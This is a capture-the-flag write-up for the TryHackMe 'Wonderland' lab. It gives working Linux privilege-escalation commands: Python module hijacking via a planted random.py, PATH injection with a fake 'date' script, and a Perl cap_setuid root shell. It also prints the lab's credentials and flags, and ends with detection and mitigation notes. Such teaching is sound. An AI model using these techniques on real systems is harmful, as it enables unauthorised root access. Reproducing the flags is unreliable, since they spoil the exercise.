<!DOCTYPE HTML>
<html lang="en" class="light sidebar-visible" dir="ltr">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Wonderland - Ruohao&#x27;s Cyber Notes &amp; Writeups</title>


        <!-- Custom HTML head -->

        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff">

        <link rel="icon" href="../../../favicon.svg">
        <link rel="shortcut icon" href="../../../favicon.png">
        <link rel="stylesheet" href="../../../css/variables.css">
        <link rel="stylesheet" href="../../../css/general.css">
        <link rel="stylesheet" href="../../../css/chrome.css">
        <link rel="stylesheet" href="../../../css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="../../../FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="../../../fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" id="highlight-css" href="../../../highlight.css">
        <link rel="stylesheet" id="tomorrow-night-css" href="../../../tomorrow-night.css">
        <link rel="stylesheet" id="ayu-highlight-css" href="../../../ayu-highlight.css">

        <!-- Custom theme stylesheets -->


        <!-- Provide site root and default themes to javascript -->
        <script>
            const path_to_root = "../../../";
            const default_light_theme = "light";
            const default_dark_theme = "navy";
            window.path_to_searchindex_js = "../../../searchindex.js";
        </script>
        <!-- Start loading toc.js asap -->
        <script src="../../../toc.js"></script>
    </head>
    <body>
    <div id="mdbook-help-container">
        <div id="mdbook-help-popup">
            <h2 class="mdbook-help-title">Keyboard shortcuts</h2>
            <div>
                <p>Press <kbd>←</kbd> or <kbd>→</kbd> to navigate between chapters</p>
                <p>Press <kbd>S</kbd> or <kbd>/</kbd> to search in the book</p>
                <p>Press <kbd>?</kbd> to show this help</p>
                <p>Press <kbd>Esc</kbd> to hide this help</p>
            </div>
        </div>
    </div>
    <div id="body-container">
        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                let theme = localStorage.getItem('mdbook-theme');
                let sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            const default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? default_dark_theme : default_light_theme;
            let theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            const html = document.documentElement;
            html.classList.remove('light')
            html.classList.add(theme);
            html.classList.add("js");
        </script>

        <input type="checkbox" id="sidebar-toggle-anchor" class="hidden">

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            let sidebar = null;
            const sidebar_toggle = document.getElementById("sidebar-toggle-anchor");
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
                sidebar_toggle.checked = false;
            }
            if (sidebar === 'visible') {
                sidebar_toggle.checked = true;
            } else {
                html.classList.remove('sidebar-visible');
            }
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <!-- populated by js -->
            <mdbook-sidebar-scrollbox class="sidebar-scrollbox"></mdbook-sidebar-scrollbox>
            <noscript>
                <iframe class="sidebar-iframe-outer" src="../../../toc.html"></iframe>
            </noscript>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle">
                <div class="sidebar-resize-indicator"></div>
            </div>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky">
                    <div class="left-buttons">
                        <label id="sidebar-toggle" class="icon-button" for="sidebar-toggle-anchor" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </label>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="default_theme">Auto</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search (`/`)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="/ s" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Ruohao&#x27;s Cyber Notes &amp; Writeups</h1>

                    <div class="right-buttons">
                        <a href="../../../print.html" title="Print this book" aria-label="Print this book">
                            <i id="print-button" class="fa fa-print"></i>
                        </a>

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <div class="search-wrapper">
                            <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                            <div class="spinner-wrapper">
                                <i class="fa fa-spinner fa-spin"></i>
                            </div>
                        </div>
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <h1 id="wonderland-ctf"><a class="header" href="#wonderland-ctf">Wonderland CTF</a></h1>
<blockquote>
<p>End‑to‑end exploitation path with commands, rationale, and mitigations.</p>
</blockquote>
<h2 id="scope--target"><a class="header" href="#scope--target">Scope &amp; Target</a></h2>
<ul>
<li><strong>Host:</strong> <code>10.201.105.251</code></li>
<li><strong>Goal:</strong> Obtain user and root flags</li>
<li><strong>Methodology:</strong> Recon → Web enum → Initial access → Priv‑esc chain (alice → rabbit → hatter → root)</li>
</ul>
<hr />
<h2 id="tldr-path"><a class="header" href="#tldr-path">TL;DR Path</a></h2>
<ol>
<li><strong>Web enum</strong> discovers <code>/r/a/b/b/i/t/</code> and reveals credentials <code>alice:HowDothTheLittleCrocodileImproveHisShiningTail</code>.</li>
<li><strong>SSH</strong> as <code>alice</code>.</li>
<li><strong>Sudo‑allowed Python</strong> as user <code>rabbit</code> executes <code>/home/alice/walrus_and_the_carpenter.py</code>; <strong>hijack Python module resolution</strong> with a malicious <code>random.py</code> to pop a shell as <code>rabbit</code>.</li>
<li><strong>Tea Party binary</strong> is vulnerable to <strong>PATH injection</strong> on <code>date</code>; craft <code>/tmp/bin/date</code> → shell as <code>hatter</code>.</li>
<li>Enumerate <strong>capabilities</strong>; <code>/usr/bin/perl</code> has <code>cap_setuid+ep</code>. Use Perl to setuid(0) → <strong>root</strong>.</li>
<li>Read flags.</li>
</ol>
<hr />
<h2 id="recon"><a class="header" href="#recon">Recon</a></h2>
<h3 id="nmap"><a class="header" href="#nmap">Nmap</a></h3>
<pre><code class="language-bash">nmap -sV -Pn -oN nmap.txt 10.201.105.251
# 22/tcp open  ssh OpenSSH 7.6p1
# 80/tcp open  http Golang net/http server
</code></pre>
<p>Notes: Two exposed services, HTTP on 80 looks like a Go server, likely a light file server or app; SSH is present for potential credential reuse.</p>
<h3 id="content-discovery"><a class="header" href="#content-discovery">Content Discovery</a></h3>
<pre><code class="language-bash">ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.201.105.251/FUZZ
# ... r (301), img (301), index.html (301)

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.201.105.251/r/FUZZ
# ... a (301)
</code></pre>
<p>Manual traversal suggests a rabbit‑hole (literally).</p>
<hr />
<h2 id="web-enumeration--credential-disclosure"><a class="header" href="#web-enumeration--credential-disclosure">Web Enumeration → Credential Disclosure</a></h2>
<p>Progressive path guessing:</p>
<pre><code class="language-bash">curl http://10.201.105.251/r/
curl http://10.201.105.251/r/a/
curl http://10.201.105.251/r/a/b/b/i/t/
</code></pre>
<p>Final page contains a hidden line with credentials:</p>
<pre><code class="language-html">&lt;p style="display: none;"&gt;
  alice:HowDothTheLittleCrocodileImproveHisShiningTail
&lt;/p&gt;
</code></pre>
<hr />
<h2 id="initial-foothold-ssh--alice"><a class="header" href="#initial-foothold-ssh--alice">Initial Foothold (SSH → alice)</a></h2>
<pre><code class="language-bash">ssh alice@10.201.105.251
whoami &amp;&amp; id &amp;&amp; ls -la
# user: alice
</code></pre>
<p>Interesting files:</p>
<ul>
<li><code>~/walrus_and_the_carpenter.py</code></li>
<li><code>~/root.txt</code> (not readable yet)</li>
</ul>
<p>Sudo privileges:</p>
<pre><code class="language-bash">sudo -l
# (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
</code></pre>
<hr />
<h2 id="alice--rabbit-python-module-hijacking-via-randompy"><a class="header" href="#alice--rabbit-python-module-hijacking-via-randompy">alice → rabbit: Python Module Hijacking via <code>random.py</code></a></h2>
<p><code>walrus_and_the_carpenter.py</code>:</p>
<pre><code class="language-python">import random
poem = """..."""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
</code></pre>
<p><strong>Observation:</strong> Python’s import order puts the <strong>script directory</strong> early in <code>sys.path</code>. If we drop a <code>random.py</code> next to the target script, it will be imported <strong>instead of</strong> the stdlib <code>random</code> module.</p>
<p>Create malicious module:</p>
<pre><code class="language-python"># /home/alice/random.py
import os
os.execl('/bin/bash', 'bash', '-p')
</code></pre>
<p>Execute as <code>rabbit</code> via sudo:</p>
<pre><code class="language-bash">sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
whoami
# rabbit
</code></pre>
<hr />
<h2 id="rabbit--hatter-path-injection-on-teaparty"><a class="header" href="#rabbit--hatter-path-injection-on-teaparty">rabbit → hatter: PATH Injection on <code>teaParty</code></a></h2>
<p>List rabbit’s home:</p>
<pre><code class="language-bash">ls -la /home/rabbit
# teaParty (ELF or script)
/home/rabbit/teaParty
# Output includes: "Probably by Sun, 09 Nov 2025 00:46:02 +0000"
# The program likely calls `date` without an absolute path.
</code></pre>
<p>Exploit by shadowing <code>date</code>:</p>
<pre><code class="language-bash">mkdir -p /tmp/bin
printf '#!/bin/sh\n/bin/sh -p\n' &gt; /tmp/bin/date
chmod +x /tmp/bin/date
PATH=/tmp/bin:$PATH /home/rabbit/teaParty

id
# uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
</code></pre>
<hr />
<h2 id="hatter--root-linux-capabilities-perl-cap_setuid"><a class="header" href="#hatter--root-linux-capabilities-perl-cap_setuid">hatter → root: Linux Capabilities (Perl <code>cap_setuid</code>)</a></h2>
<p>Enumerate capabilities:</p>
<pre><code class="language-bash">getcap -r / 2&gt;/dev/null
# /usr/bin/perl = cap_setuid+ep
# /usr/bin/perl5.x = cap_setuid+ep
</code></pre>
<p>Abuse with Perl:</p>
<pre><code class="language-bash">/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
id
# uid=0(root)
</code></pre>
<hr />
<h2 id="loot-flags"><a class="header" href="#loot-flags">Loot (Flags)</a></h2>
<pre><code class="language-bash">cat /root/user.txt /home/alice/root.txt
# thm{"Curiouser and curiouser!"}
# thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
</code></pre>
<hr />
<h2 id="detection--forensics-notes"><a class="header" href="#detection--forensics-notes">Detection &amp; Forensics Notes</a></h2>
<ul>
<li>Web access logs for <code>/r/a/b/b/i/t/</code> reveal reconnaissance timeline.</li>
<li><code>.bash_history</code> for <code>alice</code>, <code>rabbit</code>, <code>hatter</code> (if not restricted) exposes commands: <code>sudo -u rabbit ...</code>, <code>PATH=/tmp/bin:$PATH ...</code>, Perl setuid exploit.</li>
<li>File system artifacts:
<ul>
<li><code>/home/alice/random.py</code></li>
<li><code>/tmp/bin/date</code></li>
</ul>
</li>
<li><code>auth.log</code> / <code>secure</code> entries for escalations tied to <code>sudo</code> and SSH sessions.</li>
<li><code>getcap</code> enumeration indicates misconfiguration (capability left on an interpreter).</li>
</ul>
<hr />
<h2 id="mitigations"><a class="header" href="#mitigations">Mitigations</a></h2>
<ul>
<li><strong>Web app / Content:</strong> Don’t expose credentials in hidden DOM; move secrets to server‑side; apply content reviews.</li>
<li><strong>Least privilege:</strong> Remove sudo rules that allow executing interpreters; if needed, whitelist exact binaries with <strong>absolute</strong> interpreter paths and <code>NOEXEC</code> mounts where possible.</li>
<li><strong>Python imports:</strong> Execute with sanitized <code>PYTHONPATH</code>; vendor required modules; run with <code>-I</code> (isolated mode) or set <code>sys.path</code> explicitly.</li>
<li><strong>PATH safety:</strong> In set‑uid or privileged binaries, <strong>use absolute paths</strong> for all external calls or drop privileges before invoking utilities.</li>
<li><strong>Capabilities:</strong> Avoid granting <code>cap_setuid</code> to interpreters (Perl/Python). If required, wrap capability into a minimal, audited helper in C that drops privileges immediately after use.</li>
<li><strong>Monitoring:</strong> Alert on capability changes (<code>setcap</code>), unexpected binaries in world‑writable directories (<code>/tmp/bin/*</code>), and suspicious <code>sudo -u &lt;otheruser&gt;</code> patterns.</li>
</ul>
<hr />
<h2 id="appendix--full-command-log"><a class="header" href="#appendix--full-command-log">Appendix — Full Command Log</a></h2>
<pre><code class="language-bash"># Recon
nmap -sV -Pn -oN nmap.txt 10.201.105.251
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.201.105.251/FUZZ
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.201.105.251/r/FUZZ
curl http://10.201.105.251/r/a/b/b/i/t/

# Initial access
ssh alice@10.201.105.251

# Escalate to rabbit
cat /home/alice/walrus_and_the_carpenter.py
printf 'import os\nos.execl(\"/bin/bash\",\"bash\",\"-p\")\n' &gt; /home/alice/random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

# Rabbit → Hatter (PATH injection)
mkdir -p /tmp/bin
printf '#!/bin/sh\n/bin/sh -p\n' &gt; /tmp/bin/date
chmod +x /tmp/bin/date
PATH=/tmp/bin:$PATH /home/rabbit/teaParty

# Hatter → Root (capabilities)
getcap -r / 2&gt;/dev/null | grep perl
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

# Proof
cat /root/user.txt /home/alice/root.txt
</code></pre>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../../../writeups/tryhackme/CTF collection Vol.2/index.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>

                            <a rel="next prefetch" href="../../../references/index.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../../../writeups/tryhackme/CTF collection Vol.2/index.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>

                    <a rel="next prefetch" href="../../../references/index.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
            </nav>

        </div>




        <script>
            window.playground_copyable = true;
        </script>


        <script src="../../../elasticlunr.min.js"></script>
        <script src="../../../mark.min.js"></script>
        <script src="../../../searcher.js"></script>

        <script src="../../../clipboard.min.js"></script>
        <script src="../../../highlight.js"></script>
        <script src="../../../book.js"></script>

        <!-- Custom JS scripts -->



    </div>
    </body>
</html>
